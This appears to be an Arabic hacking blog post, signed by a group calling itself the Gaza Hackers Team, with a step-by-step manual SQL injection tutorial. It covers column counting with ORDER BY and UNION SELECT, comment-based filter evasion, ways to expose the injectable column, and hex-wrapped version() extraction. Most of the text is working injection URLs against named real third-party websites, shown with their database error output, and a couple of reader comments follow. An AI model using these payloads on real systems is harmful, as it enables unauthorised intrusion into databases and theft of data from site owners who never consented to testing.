الاساليب الاحترافيه الإفتراضيه المتبعه فى حقن قواعد البيانات .


الموضوع الإستِبَاقِي الثانى [Discovery vuln column number's].


الاساليب الاحترافيه الإفتراضيه المتبعه فى حقن قواعد البيانات .


# السيناريو المتبع بعد اكتشاف الثغره #

بعد اكتشاف ثغرة الحقن بالموقع المستهدف نبدئ فى استخراج عدد الاعمده بالقاعده وذلك عن طريق اسلوبين مختلفين .

الاسلوب الاول : order by 1000  .

ملحوظه :

الحقن الافتراضى اما إنتجر او إسترنج  :

Integer Injection:

id=1 order by 1000 --

String Injection:

id=1' order by 1000 +--+/



وفيه نقوم بمجاراة  order by 1000  ونقوم باضافة هذا الاستعلام للرابط المصاب عندها نرى ناتج يخبرنا بأن عدد الاعمده خطاء ويختلف شكل هذا الناتج


من قاعده الى اخرى كما نرى بالأمثله التاليه :

 .
•◘╚╦☆ MySQL ☆╚╦◘•
www.marinaplast.com/page.php?id=13 order by 1000
Unknown column '1000' in 'order clause'





•◘╚╦☆ PostgreSQL ☆╚╦◘•
http://www.sabbaba.co.il/prod.phtml?cat_id=9 order by 1000
ORDER BY position 1000 is not in select list





•◘╚╦☆ Microsoft SQL Server ☆╚╦◘•
http://testasp.vulnweb.com/showthread.asp?id=1 order by 1000
The ORDER BY position number 1000 is out of range of the number of items in the select list.




•◘╚╦☆ Oracle ☆╚╦◘•
http://www.debunschoter.nl/scripts/edoris/edoris.dll?tem=bun_text_detail_new&doc_id=90105 order by 1000
ORA-01785: ORDER BY item must be the number of a SELECT-list expression







ومن ثما نقوم بالتقليل الى ان يختفى الخطاء ونعرف عدد الاعمده .




الاسلوب الثانى :  UNION ALL SELECT NULL


فى حالة فشل اسلوب order by 1000 فى العمل نلجئ الى الاسلوب الثانى وهو عباره عن اضافة الاستعلام UNION ALL SELECT 1 بنهاية رابط الموقع المصاب .

سيظهر خطاء يدل على ان عدد الاعمده غير صحيح مثل الاخطاء التى اسلفت ذكرها او تظهر صفحه بيضاء فى حالة إذا كان المسؤول أعدَ خادم الويب على اللا  تعودة رسائل الخطأ نصيه .


ملحوظه هامه تتضح مع هذا المثال :


عند استخدامنا للاسلوب الثانى UNION ALL SELECT 1 مع موقع ما بعد فشل الاسلوب الاول من العمل :


http://pronajmy.vitkovice.cz/detail_pozice.php?id=7 order by 1 --


كالتالى :


http://pronajmy.vitkovice.cz/detail_pozice.php?id=7 union all select 1 --



 


ظهر لنا خطاء :


 Unknown column 'nullunionselect1' in 'where clause'



الان قبل ان نكمل بالزياده الرقميه نقوم بفلترة union all select لنرى اذا كان هناك اى تغير .

فإن حدث تغير نكمل الحقن بالفلترة وان لم يحدث تغير نكمل الحقن من دون الفلتره .

pronajmy.vitkovice.cz/detail_pozice.php?id=7 /*!union*/ all /*!select*/ 1






الان إتتضحت لكم الفكره .



بعض الملاحظات الحيويه على الموضوع :

فى حالة عدم ظهور الاعمده المصابه بالصفحه نتبع ثلاث اساليب مختلفه
للكشف عنها نتابع .


1- إضافة قيمه سالبه للمتغير لجعل القاعده تتجاهل كل مايأتى بعده وهذا الاسلوب يسمى null the parameter .

القيم التى نستطيع اضافتها الى المتغير :


id=-1

id=null

id=1+and+false+

id=9999

id=1 and 0   and(0)

id==1

id=(-1)

id=1*0

# ID = UP^ DOWN> [ اى الزياده فى رقم المتغير ]



# مثال تطبيقى #


http://www.karenginger.com/section.php?id=1 union /*!select*/ 1,2,3,4,5 --





http://www.karenginger.com/section.php?id=1 and 0 union /*!select*/ 1,2,3,4,5 --







2- ان لم يفلح الاسلوب الاول نلجئ الى الاسلوب الثانى وهو اضافة قيمه موجبه للمتغير نتابع .

القيم التى نستطيع اضافتها بعد المتغير :


+AND+1=0

/*!aND*/ 1 like 0

+/*!and*/+1=0

+and+2>3+

+and(1)=(0)

and (1)!=(0)

+div+0

Having+1=0



# مثال تطبيقى #


jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+







jumble.dibbaa.com/article.php?id=7' /*!aND*/ 1 like 0 union select 1,2,3,4,5,6,7,8 +--+








3- استخدام HTML source code للكشف عن الاعمده المصابه .


وطريقة عمل هذا الاسلوب بتكرار رباعى للاعمده ثم البحث بالسورس عن الاعمده المصابه الظاهره لنا كالتالى :


# مثال تطبيقى #



http://readinganalysis.com/view.php?id=31 and 1=0 union /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12 --




http://readinganalysis.com/view.php?id=31 and 1=0+union /*!select*/ 1111,2222,3333,4444,5555,6666,7777,8888,9999,10101010,11111111,12121212 --





نفتح السورس باج ونضغظ Ctrl+f ثم نكتب 1111 2222 تباعاً حتى نعثر على الاعمده المصابه بالصفحه .






الاعمده المصابه فقط رقم واحد .




http://readinganalysis.com/view.php?id=31 and 1=0+union /*!select*/ version(),2222,3333,4444,5555,6666,7777,8888,9999,10101010,11111111,12121212 --







ولتجنب حقن السورس كما شرحت سابقاً نستخدم احد الاستعلامين مع استعلامات الحقن ونضعها بمكان العمود المصاب .



# 1 #

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)


# 2 #

concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)



http://readinganalysis.com/view.php?id=31 and 1=0+union /*!select*/ concat(0x223e3c62723e,version(),0x3c696d67207372633d22),2222,3333,4444,5555,6666,7777,8888,9999,10101010,11111111,12121212 --







:: الان أشعِلٌو مخيلَتَكمْ بعدَ إستيعَابِكم لهذاَ الموضوعْ ::



 ☆╚╦◘• فريق قراصنة غزة •◘╚╦☆   



هناك تعليقان (2):

  1. Unknown15 أكتوبر 2013 في 3:13 م

    هل الافضل برنامج هافج ام الحقن اليدوي هذا يا ادمن

    ردحذف
  2. Unknown7 ديسمبر 2015 في 4:09 م

    انت ميه ميه واي جديد بلغنا فيه

    ردحذف

الاشتراك في: الرسائل (Atom)